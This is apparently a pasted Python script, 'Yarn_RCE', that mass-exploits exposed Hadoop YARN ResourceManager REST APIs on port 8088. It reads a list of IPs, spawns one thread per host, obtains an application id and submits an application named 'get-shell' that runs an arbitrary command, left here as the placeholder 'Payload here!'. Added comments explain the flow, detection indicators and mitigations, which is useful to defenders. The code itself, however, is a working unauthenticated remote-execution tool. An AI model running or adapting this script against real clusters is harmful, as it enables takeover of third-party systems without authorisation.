miraip0ts

Yarn_RCE

Sep 26th, 2020 (edited)
  1. import sys
  2. import threading
  3. import requests
  4. import os
  5. from Queue import *
  6. from threading import Thread
  7.  
  # Module-level setup; all of it runs as soon as the file is loaded.
  # ips: every line of the file named by sys.argv[1]. Each line is later used
  # verbatim as the host part of a URL. The file handle is never closed.
  8. ips = open(sys.argv[1], "r").readlines()
  # Work queue that main() fills and then drains. `Queue` comes from the
  # Python 2 module name imported at the top of the listing.
  9. queue = Queue()
  # Count of hosts placed on the queue; main() updates it through `global`.
  10. queue_count = 0
  # Command string that rtek() copies into the YARN application's
  # am-container-spec. It is only a placeholder in this paste. When triaging a
  # recovered copy of this script, the value assigned here is the command the
  # cluster was asked to run and is the first indicator to extract.
  11. cmd = "Payload here!"
  12.  
  13.  
  # rtek(host): ask one host's YARN ResourceManager REST API (port 8088) to
  # run the module-level `cmd` as a new application.
  #
  # What the listing does, in order:
  #   1. POST /ws/v1/cluster/apps/new-application and read 'application-id'
  #      from the JSON reply.
  #   2. POST /ws/v1/cluster/apps with a submission document that reuses that
  #      id and carries `cmd` in am-container-spec -> commands -> command.
  # Neither request sends credentials, tokens or custom headers, so the
  # submission is only accepted by a ResourceManager that allows
  # unauthenticated REST calls from the sender's network.
  #
  # Detection: the two POSTs above arriving from one client moments apart;
  # the fixed application name 'get-shell'; plain HTTP to 8088 from outside
  # the cluster; the default python-requests User-Agent (no headers are
  # overridden here).
  # Mitigation: keep 8088 unreachable from untrusted networks and require
  # authentication on the ResourceManager web services (e.g. Kerberos/SPNEGO);
  # confirm the exact settings against the deployed Hadoop version.
  # Returns None in every case.
  14. def rtek(host):
  15.     try:
              # Step 1: request a fresh application id. 3-second timeout.
  16.         url = 'http://' + host + ':8088/ws/v1/cluster/apps/new-application'
  17.         resp = requests.post(url, timeout=3)
              # A non-JSON reply or a missing key raises here and is swallowed
              # by the bare except below.
  18.         app_id = resp.json()['application-id']
              # Step 2: submit the application under the id just obtained.
  19.         url = 'http://' + host + ':8088/ws/v1/cluster/apps'
  20.         data = {
  21.             'application-id': app_id,
                  # Fixed literal: a searchable string in ResourceManager
                  # application listings and logs.
  22.             'application-name': 'get-shell',
  23.             'am-container-spec': {
  24.                 'commands': {
                          # The module-level `cmd`, passed through unchanged.
  25.                     'command': '%s' % cmd,
  26.                 },
  27.             },
  28.             'application-type': 'YARN',
  29.         }
  30.         requests.post(url, json=data, timeout=3)
              # Printed whenever the second POST returns without raising. The
              # HTTP status is never inspected, so a printed host means "the
              # request was answered", not "the application ran". Confirm on
              # the cluster side before treating a listed host as compromised.
  31.         print("[] - %s" % host)
          # Bare except: every failure (timeout, refused connection, bad JSON)
          # is discarded silently, so hosts that rejected the request leave no
          # trace in the script's output.
  32.     except:
  33.         pass
  34.     return
  35.  
  36.  
  # main(): queue every line of `ips`, then start one thread per queued host,
  # each running rtek(host). Returns None.
  #
  # There is no cap on the number of threads and no delay between starts, so
  # the traffic seen by defenders is a burst of short-lived HTTP connections
  # to port 8088 on many addresses from a single source.
  37. def main():
  38.     global queue_count
  39.     for line in ips:
              # Only "\r" and "\n" are stripped; any other whitespace in the
              # input line stays part of the host string.
  40.         line = line.strip("\r")
  41.         line = line.strip("\n")
  42.         queue_count += 1
              # Progress counter rewritten in place on one terminal line.
  43.         sys.stdout.write("\r[%d] Added to queue" % (queue_count))
  44.         sys.stdout.flush()
  45.         queue.put(line)
  46.     sys.stdout.write("\n")
  47.     i = 0
          # Drain exactly as many items as were queued above.
  48.     while i != queue_count:
  49.         i += 1
  50.         try:
                  # NOTE(review): `input` shadows the builtin of the same name.
  51.             input = queue.get()
  52.             thread = Thread(target=rtek, args=(input,))
  53.             thread.start()
  54.         except KeyboardInterrupt:
                  # Ctrl-C sends signal 9 to the script's own PID, so the
                  # process ends without any cleanup.
  55.             os.kill(os.getpid(), 9)
          # Only the most recently started thread is joined. If `ips` was
          # empty, `thread` was never bound and this line raises NameError.
  56.     thread.join()
  57.     return
  58.  
  59.  
  # Run main() only when the file is executed as a script. The module-level
  # open(sys.argv[1]) near the top of the listing is not behind this guard and
  # runs on import as well.
  60. if __name__ == "__main__":
  61.     main()
  62.  